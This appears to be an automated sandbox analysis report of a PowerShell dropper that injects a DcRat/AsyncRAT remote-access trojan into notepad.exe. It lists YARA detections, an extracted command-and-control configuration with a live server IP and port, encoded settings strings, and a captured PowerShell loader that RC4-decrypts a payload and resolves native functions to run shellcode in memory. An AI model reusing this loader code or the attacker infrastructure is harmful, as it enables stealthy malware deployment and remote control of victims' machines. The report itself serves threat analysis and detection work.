Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp |
Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["91.92.252.234"], "Certificate": "MIICKTCCAZKgAwIBAgIVAKS5rqUGvWQFohqhbbhc/fhczFOxMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNTI2MTIyOTU1WhcNMzQwMzA0MTIyOTU1WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAjGggOWyKXHfRasv3ufPfya8A0qsxRAddSMAEiqyDLn9M1H6RFDtqd/Yok/NubIYLe1FbXiB0YfCR5RgdsQVKnUSEA2sI64BtMLpe/b15JcHRFWCt3Vr0Ho1S1Vpym4tXD3C2pBb+0Xwdx2z46EhZun0Lg/7fxMO+MR5EP+ZSzn0CAwEAAaMyMDAwHQYDVR0OBBYEFN19qEt9bh/uiiMyJBaJLMC7IcpgMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEALf1x+A2bpgZri/KC6IBK2KIhZ634c6L+XeB/lfFGD7HFklggfsiRpl5v6/we6amFaV2uLlFVr2uduITo9ItSBzei5GvPVJvb7HGKY1TRdeGrur2Jm1KgNvMTLOhRw+4rStVaGPP2EzKEvev7ufogjloM3cAkhevaNasxxcDhMCw=", "Server Signature": "MZCsI864kmIzKFJC44vL3ya3ABqlMaLoEPmnFnwJE3ff3mZPALfgyzyzZ6QEJ/IzBakmLsEJga3Ls/81f/i6c++NCJCFfkeq/72Z5DXypIfIHefvzC/jQJR4Vg3yGUxtv1dmoafcvwBchkK5sy3fwqJ0BXfUgy7iJUDxOUMs50s="} |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2299448154.000001F0C81F2000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.2300072444.000001F0CA051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2300072444.000001F0CA051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: Yara match |
File source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000003.00000002.2300760860.000001FEDB6FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000003.00000002.2301419592.000001FEDD421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642523 |
3_2_000001FEDB642523 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642103 |
3_2_000001FEDB642103 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB64295B |
3_2_000001FEDB64295B |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642DE3 |
3_2_000001FEDB642DE3 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB6414DB |
3_2_000001FEDB6414DB |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000003.00000002.2300760860.000001FEDB6FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000003.00000002.2301419592.000001FEDD421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, Settings.cs |
Base64 encoded string: 'ZKy9yrztpz7yv3/a1mEzj7LN1ILbjAEngwbJuJN9gXUu2eYPLZGP4ulxSCEkn+5i8r0vJujifi71RwLaW3nyag==', 'ybygf6+agXAHWxflsE7Sr+wxZU6JYC+Pvd1S4RZ5sQSB0NtjWt5QTygoRGp+pMg28vvgeT0Oh4nItVicifUq0Q==', 'qTRhtxKTffPeOJ3knxBmUWWYHCE0+dVGhddRopV3Mlf6RSzuTneF8s4ZbOKqALBC1zmBEqplhVyEj2jpjYyY/g==', 'wiy6g6MUPmF4m/1bjIHPPUPZHcs2bgU7f4IZblHyBnHIh3P69HxgY+MqTPnxWb9Iz5xEsNmWgHThh28CTMs+s6IZ7Rf8mns9WANc8L372g1BeiFZiviCF5MiB/IeLQlfQGCkypHuAXuQaTtQn4Ioc/YGlrSOyL1NUv42+RRls71outdBa7pIB1zZ9hBpaeAr1exIMtL+Js2B/Xqy+XkEn8Zi55N3wuHTFb46WcidEggZ4LMinWq4Qd6/w2mHc/Ry+NMWBVVLQazNdj6b+P4VTM3n8b4QRW3Pk9ZlxoXsliJpEN7HCYuOHjUFPfyzRX0oYy7h1qSLoAXMQkDNQuDVc63/yVrFYw7ETOCMYXqdT2aKMbwkn4v+N5JJ1Q4Y8gPiSs1nrufgAw0QQbLV40UE5Kbz5SaqsYp8Bn2m4Cb9hspjlKd2qUVqLyJ2V7+FNwKv1Znwi2tjecQnoacR+zOnfZ8bz9wSZkak67PTaw/kPX/42YjE9tGq6ZbYPEQethQyixmB3r5p22kmcI3vvBlIv/R9QNAM1CYHRcHA8vYh662Qpw9T0xDJhILEEXG6k6CNHvj0kidRL9c7m/54415xDeGc/AaaiZ0KbctlyjvvDoDCqp++Egs1BzJ8aXfet3Aa1tEQqiDAwXAgTrhIwzDci9GnFeovmgSeQms9yp5RDWhiMY2f5AmQq76rz4jKwIGnuBzjSfk0ceUuASBMvaVygFVOSm7CSpD4hpEFNqNumMjvuTZ6MImmAFPqE3MF3BdMvvNhl0X3bld6bJYWSq+Lk7B6psdb2Yv1nEYG7K5kXFbpMuxmyhgh9kkH5HkbXeQ7XoLFq0Su7X51xfCkcmLyhfKqGYhOOAwRzhN2Iewu6S01BfKhzvHEtj7ijl1kTSerglGkLU5t6BkEt8Gdm+cCcqtbW3HKoj/z1CIoqhc1Ji28hUYGHkWmyywRyImOwlVtIm9gdvolhFK8gevIehJi/sNGbhAUqaPuWD1VT6XyM7S9YsJQ9uZBcAnedsnBp9cE3iJjQGu37evNrxlJW2U2KhmtPGHx71TTHrqQ+gBhG5I=', 'JNo5eYTTmLScwaJty1FGb9Cw1L5a7Bx99KM5Rb3CC8iFe5FH8A7Y/2uLaJHGoIAHjA+xgAhpsZQf9r6JqLtdXA==', 'HpJFVrfZtMkBQA7PAo91pVXU4D8x7V4+OxVLUsIQtKG2xK+iRXY501yTtQItCuLbDtSXqlxi/mHSeX2jaKPm+w==', 'vJNb45CmzU209S7A3rIKofVdmRiwGIW6iqJmEv0PUpsotSRkfxFRQLZL4KfU1/yWdhvgXAffWTpS6tZKK1shbw==' |
Source: classification engine |
Classification label: mal100.troj.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Jump to behavior |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkawl2pe.cxf.ps1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('RZFdLsQoJoqVbbjT0p6FA4g7ie5N4K1RCJ0YAeGhMwRP68LYH7h0FZRO28FkxQaD3ballhhMTLrk6hhPIwKSVacUZXCtb/NX2gT1qSqdKQTapIVAjUN2YAJGDSnR824sM/MaaUxY3mbKw5u0d9gguDpfaGbaUHXRmOu4t/q150qnOkabAJ39uVGPyPoPk6m8a8SEbLZuh |